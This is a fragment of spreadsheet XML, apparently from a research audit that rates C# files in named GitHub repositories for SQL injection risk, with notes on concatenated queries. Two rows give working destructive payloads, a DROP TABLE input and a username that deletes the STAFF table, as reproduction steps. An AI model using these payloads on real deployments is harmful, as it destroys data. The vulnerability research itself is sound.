    <s v="https://github.com/Asaad7075/Mohamed-Capstone-2021/raw/a83733764a6a7d9e9838b077597284886822f293/Capstone-2021-PM-main/BackOnTrack/DataAccessLayer/VehicleMaintenanceStatusAccessor.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-09T00:00:00"/>
    <s v="https://github.com/sharifqasrawi/SIF-IT-Dept-app/raw/ca5378e51eca0bda8e69cf3d3138bf947a58c8a2/PL/frmPayDocs.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="97"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Table name is concatentated to the SQL statement. The name of the table comes from a drop down list. These are generally safer than text boxes but injection might still be possible."/>
    <s v="20_x000a_%"/>
    <n v="5"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/TheBigBang2/GroupProject223/raw/d8b98322dc35a1da43ff7ae7244064451cfed4db/GroupProject223/MaintainBooking.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Marnus-Creator/Corona-Couriers/raw/0e710b6d465180e6790f5652f4fc486130e84698/Corona%20Couriers/SignIn.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/warren8r/PRISM_RigTrack_206/raw/17906184d1c48e99737e7827050c0b8786793535/Modules/Configuration_Manager/UploadWinSurvDataFile.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/DudaPereira/senai_sprint_2backend/raw/aa9e206eb12a7bb179a0bb1efc8f66e26fe52cad/senai_filmes_webApi/senai_filmes_webApi/senai_filmes_webApi/Repositories/FilmeRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/yunxiaokeji/ErDangJia/raw/0c7f968b574da46557df0ae1ebc6d75794b2564b/CloudSalesDAL/Common/CommonDAL.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="51"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="SQL-IDIA is possible depending on how the functions in this file are used"/>
    <s v="50_x000a_%"/>
    <n v="30"/>
    <s v="YXAPP could not be loaded"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/zlpatrick/recruitSite/raw/efbee473881629bf111bf7107eec7a829b073f83/LeadVill/RecruitWeb/user-password.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/pekalam/workTimeMonitoring/raw/59c87132ee7aef7e0e8ff282a205bb95827d8fe1/Infrastructure/src/Repositories/SqliteWorkTimeIdGeneratorService.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dinuone/WFMCountruction/raw/5cafa96d5383ca17cc19e3e211e74eaa9f6afd7e/WFMcontruction/WFMcontruction/crud.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/raghu-13/JGInterview/raw/e2d31615c2528d623d24ee246fceb23d2fe78cd0/JG_Prospect.DAL/DesignationDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/fdhgfg/abc123/raw/43e4555c7c1f380c917b9b04be2954e1bfe61e2c/src/TygaSoft/SqlServerDAL/FeatureUser.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/tobyt99/courses/raw/957653918f819fbd4056c7220b75f27082c381fd/diveintodocker/src/07-docker-compose-in-the-real-world/06-managing-microservices-with-docker-compose/worker/src/Worker/Program.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/PanhareachIT/Inventory-Project/raw/b74f573db57f60ae9a82b8c1359d35b54acf595c/fromInventory/fromInventory/FromImport2.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/FaridIrwan/SAS/raw/d49e2d8d2f25c4fa5f7ddb0c4452de67f4469fc0/DataAccessObjects/StudentStatusDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/williamchang/creativecrew-web-aspnet-foundation_aspnet_webforms/raw/64336ce8d50939036febe74602b604a68c960467/App_Code/DatabaseCommon.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="244"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="SQL-IDIA is possible depending on how the functions in this file are used"/>
    <s v="50_x000a_%"/>
    <n v="25"/>
    <s v="&quot;The project or web cannot be found&quot;"/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/lucaSchiavon/Re2017MVCSoftware/raw/1606608a3edd4782f9a68e41326550e5a1c9dc85/Prj.Api/ItryRepository/BaseRepository.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="18"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="SQL-IDIA is possible if repo.TableName is unsanitized"/>
    <s v="50_x000a_%"/>
    <n v="25"/>
    <s v="&quot;Server Error in '/' Application&quot;"/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/KristhelBrigitte/Biblio/raw/adb95e8dcd155311af5a0470fc1fbf502b8bee01/AccesoDatos/ADEditorial.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="28"/>
    <x v="5"/>
    <s v="Did not install"/>
    <s v="SQL-IA is possible if the function arguments are not sanitized"/>
    <s v="5_x000a_0_x000a_%"/>
    <n v="5"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/shyamkawale-mindbody/HospitalManagement/raw/c096980a12a0952c4eb5b5f40cf5e16ef8eb2f7c/Application.Data.DataAccess/CanteenBillDataAccess.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/thdtjsdn/playscript-mono/raw/9ece12864ba33b68ae2e9c3aea934b7fdd2554eb/mcs/class/Mono.Data.Sqlite/Mono.Data.Sqlite_2.0/SQLiteCommand.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Rjha00119/WebBasedLearningSystem/raw/a2fcf679050872149cc226458179ee9ff47a8905/WebBasedLearningSystem/Payment.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/sofyanard/bankpapua-sme/raw/cd097db5eca9e85a9b43d667b02a26033f2b8973/Facilities/AssignBulkCO.aspx.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="65"/>
    <x v="2"/>
    <s v="Did not install"/>
    <s v="User input from a label (LBL_SORT) is directly concatented into the query, so it is likely that an injection is possible"/>
    <s v="90_x000a_%"/>
    <n v="10"/>
    <s v="Error in Visual Studio. Project could not be loaded"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Alarak666/Diplom/raw/b0abef3f3aa849b9993ed4bb0769f96a3917a1bc/WMS%20%E2%80%9431.05.2021/Main_Form/Main_Form/Table/OrderOfSupply.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Sony-NS/SharpMap/raw/e7d5432a7d9efba643d713050785c8f57c0b0ba6/src/Common/SharpMap.Extensions/Data/Providers/PostGIS.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/pitarlbq/CustomerMall/raw/86776990dd2da5c993c21d8eb5171c4fdea7d07c/platform/DataAccess/Mall/Generated.Mall_CheckRequestConfirm.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/elifakar/exorderproject/raw/1075341e84c784e050d61db8a93525bff696a811/exorderproject_api/DataAccess/UrunDataAccess.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/cdc-dpbrown/EpiInfoVHF/raw/a0dae03300ff9bbfa4aeb85062b3f7ad8983c6b2/ContactTracing.ImportExport/XmlDataImporter.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="348"/>
    <x v="9"/>
    <s v="Did not install"/>
    <s v="Lots of potentially vulnerable functions"/>
    <s v="80_x000a_%"/>
    <n v="5"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/governmentbg/RegiX-3-/raw/9398e44cb2757c8b87a665c46e3aa7f5644a5510/Adapters/RegiX.NKPDAdapter/RegiX.NKPDAdapter/AdapterService/NKPDAdapter.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/willen9/willengit/raw/2954950c80dd831eca4ba51f052669a1f0361d75/RMS2/src/rmsweb/DataAccessLayer/BOM_HDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/faester/aomlinq/raw/0cc6a822730484e14dff1cb4cf90ab2b230b1b2f/GenDB/PerformanceTests/ExcelWriter.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="47"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Vulnerable if the function parameters aren't sanitized"/>
    <s v="50_x000a_%"/>
    <n v="5"/>
    <s v="100 c#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/lucky-rydar/kpiNotificationBot/raw/325ea1ff0cbec7b483cd92aaa7d30263a2d9192a/pair_notification_tgbot/DatabaseController.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/walaa49/Agenda_ASP/raw/6dc0c72827e8e8e41b4889900f2b021c79cb2d16/TutorialCS/App_Code/Data/DataManager.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/attamunim/HotelManagement/raw/7c4b903f85b9d4c4e10678208a4c0bcc569442ce/HotelManagement/Login.cs"/>
    <x v="2"/>
    <x v="4"/>
    <n v="94"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="The verifier function constructs the SQL statements. This function uses one of its arguments for the table name. However, the table name argument is hardcoded in all calls to verifier."/>
    <s v="5_x000a_%"/>
    <n v="5"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/thachgiasoft/PMS/raw/e56cc61849bcf007f6b3e33c4acaf3742733d3f4/PMS.Data.SqlClient/SqlKyThiProviderBase.generated.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/DavidSciMeow/Discuz-NT-3.5.2-res/raw/a1ce4851bcd840478c4224b6d724394e62f81395/source_files/Discuz.Data.SqlServer/HelpManage.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/anhddq/PhanMemQuanLyKhachHang/raw/69350d89d0617e786e45aee2c2610944b4bffa3c/QLKH/QLKH.DAL/PhieuYeuCauDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Filisha223/Project-T/raw/62028e7dc817afb2cd1ef6a1869743c97f58195b/TidanSourceV4/wServer/networking/handlers/ChooseNameHandler.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/vanjavii/HighschoolGradebook/raw/0973007ca8c4d9bd8614d6fac740811e7f455b62/Repository/DatabaseRepository/GenericDbRepository.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="79"/>
    <x v="10"/>
    <s v="Did not install"/>
    <s v="There are numerous functions in this file that interpolate function arguments directly into SQL statements. If even one of these functions is not properly used even once, an injection is possible."/>
    <s v="95_x000a_%"/>
    <n v="10"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/qwerty-GT/Proyecto-Taquilla/raw/69e8320120df73aab3f3726fe594718f24760bee/App%20ADMIN/ADMIN/frm_usuarios.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/tduncan7191/Insider/raw/c44a6e2eb5d4ee51d059c70d8ad6c682890ceac6/Insider/things/truck-entry/Default.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/josueVegaR/Matricula-2021---Web/raw/1c734528119df738ea5b68d8c85ecd4427407662/AccesoDatos/ADHorarios.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="107"/>
    <x v="5"/>
    <s v="No"/>
    <s v="The ListarHorarios function in ADHorarios.cs is potentially vulnerable, but this function is only called by the ListarHorarios function in LogicaHorarios.cs. The latter function is never called. (Dead code)"/>
    <n v="0"/>
    <n v="60"/>
    <m/>
  </r>
  <r>
    <d v="2023-08-05T00:00:00"/>
    <s v="https://github.com/jvtipaymerantes/Coffee/raw/32f5e2a528f80f1a8dc837faa6b53f4fbbd7722b/coposProject/Forms/salesForm.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="186"/>
    <x v="1"/>
    <s v="Did not install"/>
    <s v="Text from textBox1 is concatenated directly into a query. This is almost certainly vulnerable to a SQL-IA"/>
    <s v="95_x000a_%"/>
    <n v="30"/>
    <s v="100% C# files. compiler errors"/>
  </r>
  <r>
    <d v="2023-08-05T00:00:00"/>
    <s v="https://github.com/zombekast/basi_dannih/raw/1fa53abfa4bd1b5a018320be7f58b3e3fd2700d3/%D0%9B%D0%B0%D0%B1%D0%B0%201%20%D0%B1%D0%B4/%D0%9B%D0%B0%D0%B1%D0%B0%201%20%D0%B1%D0%B4/Form1.cs"/>
    <x v="2"/>
    <x v="3"/>
    <n v="291"/>
    <x v="2"/>
    <s v="SQL-IDIA"/>
    <s v="Set up the DB with the exampoints table. Launch the app. Enter the following into the text box above the blue button: Maths; DROP TABLE Exampoints;#   Then click the blue button."/>
    <s v="100_x000a_%"/>
    <n v="120"/>
    <s v="100% C# files. Also vulnerable to SQL-IA"/>
  </r>
  <r>
    <d v="2023-08-05T00:00:00"/>
    <s v="https://github.com/wojilu/wojilu/raw/83a2f1c850ec49cee0f40cf8fa71bcd2d8e92313/wojilu/ORM/Operation/UpdateOperation.cs"/>
    <x v="4"/>
    <x v="1"/>
    <n v="75"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Some functions use their arguments for table and column names, so SQL-IDIA may be possible"/>
    <s v="50_x000a_%"/>
    <n v="45"/>
    <s v="Compiler errors. Unprotected library - no mitigations"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/azyobuzin/DapperMultimapBenchmark/raw/5ee8b8fa2f64f58d1f6b20a0a47f6ac1bf23d4fe/Dapper/tests/Dapper.Tests/TypeHandlerTests.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/merkez51/ElkonScadaCSharp_20200402_0020/raw/7e8eb75b8473ff303166343ff63ba78cf4fb23ab/ElkonScada/0001_Firmalar/FirmaBilgileriDuzenle.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/nitesh16304/ScreenShot-Hacking/raw/69a4e2c173eb80e7737f6c2e9e44a149948781cd/Screenshot%20Hacker%20%20Updated%20project%20code%20_%20DB/screenshothacker%20web/Login.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/OlafMd/MedCon1.0/raw/7675ef482c0eacbb633677757b77e899ac42530c/mm-libs/dbaccess/Level%201/CL1_HEC_BIL/HEC_BIL_PotentialCode_2_AppointmentTemplateBillingBlock/ORM_HEC_BIL_PotentialCode_2_AppointmentTemplateBillingBlock.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/zoomla/CMS-Source-code/raw/058828244ff1753f5a74a81432e41ce53234cd63/Zoomla%E9%80%90%E6%B5%AACMS2_x3.9%E6%BA%90%E7%A0%81-mvc/ZoomLa.BLL/Content/B_Favorite.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/liyingming8/JIEJIEJIE/raw/86764be64455e145191de878f1ff10e921ce46a1/Admin/TJ_CompADInfoAddEdit.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/IliqNikushev/prop-d-proshots/raw/5b495eaff2633aa6550cc6b40f79a7c367141483/SOURCE/App-Admin/SubMenu/Shops.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/498953584/FANPUPM/raw/f1cd54c48c3a0f89f20fedca55b96330b9e00589/PmDataAccess/cn.justwin.stockDAL/Refunding.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/thuantv9/wallbicycle/raw/a01015ed07b2ca3aaf36e9d13c54ee2ddf6b6345/OnlineHelp/Common/LocalDataSource.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/khoab17/AP_MID_SUM21/raw/d34ab93780fd10e167fca7427e3db969a476dd41/LAB%202/LabTask/Models/Database/Departments.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-04T00:00:00"/>
    <s v="https://github.com/DESUP2/Telecommunication-Management/raw/02a06f71ea6bec0a677961faf2378bf855ea63b4/Management%20Systems/Telecommunication%20Management%20System/Staff.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="54"/>
    <x v="1"/>
    <s v="SQL-IA"/>
    <s v="Set up the DB, populate the staff table with a least one row. Log in as that staff member. Go to edit. Change the staff member's username to '; DELETE FROM STAFF;-- "/>
    <s v="100_x000a_%"/>
    <n v="105"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/TheCoffeeTime/Opensim/raw/efbb664805dd87c4f411bad7bb9ee6253cc13bf2/opensim-0.7.5-source/OpenSim/Data/MSSQL/MSSQLUserAccountData.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/fluidattacks/NIST-SARD-Test-Suites/raw/7189c65ab6e398180e3f2aa2de683466b4412821/Juliet_Test_Suite_v1.3_for_C%23/src/testcases/CWE89_SQL_Injection/s02/CWE89_SQL_Injection__Web_QueryString_Web_CommandText_16.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-04T00:00:00"/>
    <s v="https://github.com/engeyads/ESCARE/raw/aec95a8396f2a8da8e0e5ae166798937c7604222/Resiept.aspx.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="76"/>
    <x v="1"/>
    <s v="Did not install"/>
    <s v="Text from txtPID, a text box, is directly concatenated into the query. This is very likely vulnerable to a SQL-IA."/>
    <s v="95_x000a_%"/>
    <n v="60"/>
    <s v="Compiler errors, could not get the project running"/>
  </r>
  <r>
    <d v="2023-08-04T00:00:00"/>
    <s v="https://github.com/TobiasTao/windows-homework/raw/487ed6805e4aa1047632f130aca3238de4322d24/WPFTest/Utils/SqliteHelper.cs"/>
    <x v="2"/>
    <x v="3"/>
    <n v="79"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Multiple functions use their parameters for table and column names. "/>
    <s v="70_x000a_%"/>
    <n v="15"/>
    <s v="Foreign language"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Hirushan-N/ProjectZ/raw/9055ac2675d74e29a74107c907b184fadfa4448a/AddSellingReport.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mai-k59/RBI-Standalone-Update/raw/3bae6fa5b6081eb1c4b7f9da5071be12b9cf2b7b/WindowsFormsApplication1/DAL/MSSQL/EXTRA_FIELDS_SETTING_ConnectUtils.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/brhinescot/Loom/raw/bf029056fcda19f87875874d555bf48a06135309/src/Loom.Data/Mapping/Providers/SqlServerProvider.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/DmitrijR13/billAuk/raw/e0267b6d1b8069c52088dbb29b24782f9cc0916c/Main/WIN/KP50.Migrator/KP50.DataBase.UpdateAssemly/2015/2015041/Migration_2015040704101.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mk8/fsgateway/raw/1fbf7bbfcc45e7f7ed24cd6b3c411a3d82fda93e/src/DB_Postgresql.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/interpriz/PNI_DB/raw/8a959156dcf3efcc880716107f5299916054a339/users/Users.xaml.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/bilal-github/OTS/raw/c4c773acfa788929f0ae9ce09c185a9f34f65d67/OnlineTestingSystem/OnlineTestingSystem/Models/ResultModel.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-03T00:00:00"/>
    <s v="https://github.com/reagtor/TradeMatchSettlementManagment/raw/71845e4141173762bf0b15e60ffa609a7bb56d3a/GTA.VTS.ManagementCenter/ManagementCenter.DAL/CommonTable/CM_NotTradeDateDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <n v="10"/>
    <s v="Uses WCF"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Thanhloi-lab/QuanlyQuanAn/raw/0261a85d932fec1a707f1454fa72909e371bc8b5/QuanLyQuanCafe/DAO/CategoryDAO.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/HHallavy/DastFood/raw/c3154442be1cbea183658a5a85df90afa9f31fb8/Classes/SQLite/FoodDB.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ProfilesRNS/ProfilesRNS/raw/bd63f2812505617dfd81b6618d82c73b38cb91e9/Website/SourceCode/SemWeb/src/SQLServerStore.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/lemonhall/playscript-mono/raw/09aded69c616735a32efb36398ef709e2bf96e0c/mcs/class/System.Data/Test/OdbcTest.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-03T00:00:00"/>
    <s v="https://github.com/sumitvatsal/ERPMarch2022/raw/23371a592fc28a5dd0a365e3e421193fe0a29b6a/schoolERP_BLL/sqlHelper.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="79"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Several functions concatenate variables for table and column names. If even one of these function parameters is not sanitized, a SQL-IDIA is possible. "/>
    <s v="70_x000a_%"/>
    <n v="60"/>
    <s v="skipping - huge project with dozens or more tables to create, and the tables are very large with many columns, not worth the time and effort"/>
  </r>
  <r>
    <d v="2023-08-03T00:00:00"/>
    <s v="https://github.com/minaik-com-tw/EIP/raw/71680e997393ef3dc7ff0a0c61dd888eb4d27827/Security/UserCompanyS.aspx.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="263"/>
    <x v="11"/>
    <s v="Did not install"/>
    <s v="Possible second order injection, depending on dguser table"/>
    <s v="10_x000a_%"/>
    <n v="15"/>
    <s v="skipping for now"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Yamulema/SitecoreNEAProject/raw/ed9243edd344355338f33f04c552481802fb10c2/src/src/Foundation/Neamb.MBCData/code/Managers/OracleManager.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/doug-sam/csmp/raw/6e4765dc8e7d574d35aa811607ead866b8573e87/DAL/Provinces.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Anzsley/Juliet_Test_Suite_v1.3_for_C_Sharp/raw/074b26fc17270913f73991fe2eba8799843cae0b/src/testcases/CWE89_SQL_Injection/s01/CWE89_SQL_Injection__Web_File_CommandText_61a.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
